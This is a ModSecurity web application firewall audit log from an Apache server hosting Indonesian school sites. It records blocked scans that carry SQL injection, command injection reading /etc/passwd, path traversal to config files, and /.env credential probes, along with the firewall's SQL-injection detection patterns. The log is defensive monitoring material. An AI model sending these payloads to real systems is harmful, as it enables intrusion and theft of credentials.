Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5b1e465-Z-- --44bb5732-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS3gAAAFY 103.236.140.4 39048 103.236.140.4 8181 --44bb5732-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 --44bb5732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44bb5732-E-- --44bb5732-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787241602 2534 (- - -) Stopwatch2: 1749039787241602 2534; combined=1143, p1=419, p2=692, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44bb5732-Z-- --53707751-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS4QAAAFM 103.236.140.4 39056 103.236.140.4 8181 --53707751-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 25 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: application/x-www-form-urlencoded --53707751-C-- type='|cat /etc/passwd||' --53707751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53707751-E-- --53707751-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250089 1260 (- - -) Stopwatch2: 1749039787250089 1260; combined=434, p1=306, p2=105, p3=0, p4=0, p5=23, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53707751-Z-- --566e4978-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9ggAAAJA 103.236.140.4 39060 103.236.140.4 8181 --566e4978-B-- POST /guest_auth/guestIsUp.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close --566e4978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --566e4978-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||up.smkn22jakarta.sch.id|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749039787250710 835 (- - -) Stopwatch2: 1749039787250710 835; combined=274, p1=245, p2=0, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --566e4978-Z-- --fecaf85c-A-- [04/Jun/2025:19:23:07 +0700] aEA6qzNXNn6zAsHj7JDS4gAAAE0 103.236.140.4 39062 103.236.140.4 8181 --fecaf85c-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://up.smkn22jakarta.sch.id/zentao/user-login.html Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 72 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Content-Type: application/x-www-form-urlencoded --fecaf85c-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --fecaf85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fecaf85c-E-- --fecaf85c-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250693 2146 (- - -) Stopwatch2: 1749039787250693 2146; combined=1289, p1=275, p2=986, p3=0, p4=0, p5=27, sr=54, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fecaf85c-Z-- --30d1456e-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9gwAAAIg 103.236.140.4 39058 103.236.140.4 8181 --30d1456e-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/116.0 Safari/537.36 --30d1456e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30d1456e-E-- --30d1456e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787250580 2431 (- - -) Stopwatch2: 1749039787250580 2431; combined=523, p1=282, p2=216, p3=0, p4=0, p5=25, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30d1456e-Z-- --80a39b63-A-- [04/Jun/2025:19:23:07 +0700] aEA6q5LmnxTwEPX7IuZ9hAAAAIM 103.236.140.4 39064 103.236.140.4 8181 --80a39b63-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 --80a39b63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a39b63-E-- --80a39b63-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039787252640 3339 (- - -) Stopwatch2: 1749039787252640 3339; combined=2367, p1=348, p2=1992, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a39b63-Z-- --994cb808-A-- [04/Jun/2025:19:23:08 +0700] aEA6rNhPZJx8OfNaLCoLCQAAANc 103.236.140.4 39086 103.236.140.4 8181 --994cb808-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 58 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded --994cb808-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --994cb808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994cb808-E-- --994cb808-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039788077496 2204 (- - -) Stopwatch2: 1749039788077496 2204; combined=679, p1=455, p2=190, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994cb808-Z-- --0f4b6641-A-- [04/Jun/2025:19:23:08 +0700] aEA6rDNXNn6zAsHj7JDS5AAAAEs 103.236.140.4 39090 103.236.140.4 8181 --0f4b6641-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 --0f4b6641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f4b6641-E-- --0f4b6641-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039788082129 1632 (- - -) Stopwatch2: 1749039788082129 1632; combined=493, p1=352, p2=115, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f4b6641-Z-- --43ff2e7b-A-- [04/Jun/2025:19:23:11 +0700] aEA6r9hPZJx8OfNaLCoLDAAAAMg 103.236.140.4 39146 103.236.140.4 8181 --43ff2e7b-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 42 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --43ff2e7b-C-- var={"body":{"file":"file:///etc/passwd"}} --43ff2e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ff2e7b-E-- --43ff2e7b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039791081284 28889 (- - -) Stopwatch2: 1749039791081284 28889; combined=54693, p1=433, p2=104, p3=0, p4=0, p5=27095, sr=118, sw=0, l=0, gc=27061 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ff2e7b-Z-- --a9cff603-A-- [04/Jun/2025:19:23:15 +0700] aEA6s9hPZJx8OfNaLCoLFQAAAMk 103.236.140.4 39242 103.236.140.4 8181 --a9cff603-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 178.128.54.187 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 178.128.54.187 X-Forwarded-Proto: https Connection: close Content-Length: 5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded --a9cff603-C-- "1":1 --a9cff603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9cff603-E-- --a9cff603-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749039795072261 2972 (- - -) Stopwatch2: 1749039795072261 2972; combined=1762, p1=514, p2=1206, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9cff603-Z-- --34b75770-A-- [04/Jun/2025:19:54:43 +0700] aEBCE9hPZJx8OfNaLCoR4wAAAMk 103.236.140.4 38708 103.236.140.4 8181 --34b75770-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 147.182.200.94 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 147.182.200.94 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --34b75770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34b75770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749041683916067 801 (- - -) Stopwatch2: 1749041683916067 801; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34b75770-Z-- --f89dc740-A-- [04/Jun/2025:20:47:34 +0700] aEBOdthPZJx8OfNaLCogTQAAAMc 103.236.140.4 60522 103.236.140.4 8181 --f89dc740-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Accept-Charset: utf-8 --f89dc740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89dc740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749044854864914 821 (- - -) Stopwatch2: 1749044854864914 821; combined=380, p1=340, p2=0, p3=0, p4=0, p5=40, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89dc740-Z-- --0e538655-A-- [04/Jun/2025:20:47:39 +0700] aEBOezNXNn6zAsHj7JDlAwAAAFE 103.236.140.4 60556 103.236.140.4 8181 --0e538655-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --0e538655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e538655-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749044859067644 746 (- - -) Stopwatch2: 1749044859067644 746; combined=305, p1=271, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e538655-Z-- --8e0f4f28-A-- [04/Jun/2025:21:13:18 +0700] aEBUfpLmnxTwEPX7IuaX1AAAAJg 103.236.140.4 32936 103.236.140.4 8181 --8e0f4f28-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 173783204 --8e0f4f28-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --8e0f4f28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e0f4f28-E-- --8e0f4f28-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749046398726484 3062 (- - -) Stopwatch2: 1749046398726484 3062; combined=1861, p1=526, p2=1292, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e0f4f28-Z-- --86241955-A-- [04/Jun/2025:21:38:15 +0700] aEBaV9hPZJx8OfNaLCowKQAAANM 103.236.140.4 59562 103.236.140.4 8181 --86241955-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.180.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.180.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --86241955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86241955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749047895728459 845 (- - -) Stopwatch2: 1749047895728459 845; combined=353, p1=295, p2=0, p3=0, p4=0, p5=58, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86241955-Z-- --da522b1e-A-- [04/Jun/2025:21:47:26 +0700] aEBcfpLmnxTwEPX7Iuaf_wAAAIo 103.236.140.4 36302 103.236.140.4 8181 --da522b1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.7.2000 Accept-Charset: utf-8 --da522b1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da522b1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749048446804182 825 (- - -) Stopwatch2: 1749048446804182 825; combined=352, p1=311, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
